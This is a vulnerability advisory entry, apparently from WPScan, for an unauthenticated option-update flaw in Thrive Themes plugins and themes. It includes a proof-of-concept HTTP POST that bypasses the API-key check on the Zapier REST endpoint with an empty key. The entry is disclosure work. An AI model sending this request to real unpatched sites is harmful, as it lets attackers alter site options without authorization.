WordPress Plugin Vulnerabilities
All Thrive Themes and Plugins - Unauthenticated Option Update
Description
The plugins and themes register a REST API endpoint associated with Zapier functionality. While this endpoint was intended to require an API key in order to access, it was possible to access it by supplying an empty api_key parameter in vulnerable versions if Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.
Proof of Concept
POST /wp-json/td/v1/optin/subscription HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
hook_url={"http:\/\/key":"maliciousfile.php"}&api_key=
Affects Plugins
Fixed in 1.4.13.3
Fixed in 1.4.15.3
Fixed in 1.3.7.3
Fixed in 2.3.9.4
Fixed in 2.3.9.4
Fixed in 2.3.9.4
Fixed in 2.3.9.4
Fixed in 2.6.7.4
Fixed in 2.3.9.3
Fixed in 2.4.5
Fixed in 1.57.1 Affects Themes
References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-24 (about 3 years ago)
Added
2021-03-24 (about 3 years ago)
Last Updated
2021-03-30 (about 3 years ago)
WPScan 